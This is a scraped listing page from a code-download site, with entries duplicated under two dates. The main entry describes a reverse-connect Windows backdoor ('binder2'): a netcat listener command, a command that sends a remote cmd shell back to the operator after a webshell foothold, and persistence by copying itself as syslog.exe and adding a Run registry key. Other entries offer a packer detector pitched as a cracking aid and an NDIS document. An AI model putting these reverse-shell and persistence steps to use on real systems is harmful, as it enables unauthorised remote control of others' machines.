Hot Search : Source embeded web remote control p2p game More...
Location : Home Search - 24
Search - 24 - List
简介: 在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用. 用法: 1. 在本地机器监听一个端口: netcat -vv -l -p 80 2. 通过webShell或是别的什么运行后门: binder2 80 youIPadd 3. 本地监听端口将截获一个来自远程主机的cmd. 注意: 程序本身会创建一个自启动方法, 如果没有参数的命令,会连接默认IP和默认端口,这个exe默认的IP地址是内网地址10.24.9.100,端口7358. 程序会复制自身到c:\\winnt\\下名为syslog.exe,并在 HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run 下创建启动键. 如果需要卸载,请使用 binder2 /kill 命令.(如果因权限问题,这些将不能执行,比如在wenshell中执行时.) 压缩包中含源码,建议按需更改代码后使用.-Profile : WEB penetration testing, we will always be the host ports are filtered, although the successful creation of a back door, but do not connect, then, the rebound in the back door-may be able to play on the point role. Usage : 1. The local machine monitoring a port : Netcat - vv-l-p 80 2. webShell or through any other running back door : binder2 80 youIPadd 3. listening to the local port intercepted from a remote host cmd. note : The process itself will create a self-starting method, in the absence of an order parameter, will connect the default IP and default port, the default exe is the IP address within the network address 10.24.9.100, port 7358. procedures will copy itself to C : \\ winnt \\ named syslog.exe and HKEY_CURRENT_USER \\ \\ Software \\ \\ Microsoft \\ \\ Windows \\ \\ CurrentVe
Date : 2008-10-13 Size : 12kb User : 张军

这是一个软件家可探测工具,程序用UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo [RAR SFX]加的壳,看不出使用什么编写的,但对于要学破解的朋友来说,这个工具是必不可少的。-This is a software tool, users can detect and procedures used unfiltered 0.89.6 - 1.02 / 1.05 - 1.24-gt; Markus Laszlo [RAR SFX] increase in the shell, do not see the kind of preparation, but we have to learn decipher friends , this tool is essential.
Date : 2008-10-13 Size : 248.22kb User : 博爱

NDIS针对IM中的数据保护处理文档,具备参考价值
Date : 2008-10-13 Size : 96.87kb User : sky

简介: 在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用. 用法: 1. 在本地机器监听一个端口: netcat -vv -l -p 80 2. 通过webShell或是别的什么运行后门: binder2 80 youIPadd 3. 本地监听端口将截获一个来自远程主机的cmd. 注意: 程序本身会创建一个自启动方法, 如果没有参数的命令,会连接默认IP和默认端口,这个exe默认的IP地址是内网地址10.24.9.100,端口7358. 程序会复制自身到c:\winnt\下名为syslog.exe,并在 HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run 下创建启动键. 如果需要卸载,请使用 binder2 /kill 命令.(如果因权限问题,这些将不能执行,比如在wenshell中执行时.) 压缩包中含源码,建议按需更改代码后使用.-Profile : WEB penetration testing, we will always be the host ports are filtered, although the successful creation of a back door, but do not connect, then, the rebound in the back door-may be able to play on the point role. Usage : 1. The local machine monitoring a port : Netcat- vv-l-p 80 2. webShell or through any other running back door : binder2 80 youIPadd 3. listening to the local port intercepted from a remote host cmd. note : The process itself will create a self-starting method, in the absence of an order parameter, will connect the default IP and default port, the default exe is the IP address within the network address 10.24.9.100, port 7358. procedures will copy itself to C : \ winnt \ named syslog.exe and HKEY_CURRENT_USER \ \ Software \ \ Microsoft \ \ Windows \ \ CurrentVe
Date : 2025-12-22 Size : 12kb User : 张军

这是一个软件家可探测工具,程序用UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo [RAR SFX]加的壳,看不出使用什么编写的,但对于要学破解的朋友来说,这个工具是必不可少的。-This is a software tool, users can detect and procedures used unfiltered 0.89.6- 1.02/1.05- 1.24-gt; Markus Laszlo [RAR SFX] increase in the shell, do not see the kind of preparation, but we have to learn decipher friends , this tool is essential.
Date : 2025-12-22 Size : 248kb User :

NDIS针对IM中的数据保护处理文档,具备参考价值-NDIS for IM data protection in the document deal with the reference value
Date : 2025-12-22 Size : 97kb User : sky
CodeBus is one of the largest source code repositories on the Internet!
Contact us :
1999-2046 CodeBus All Rights Reserved.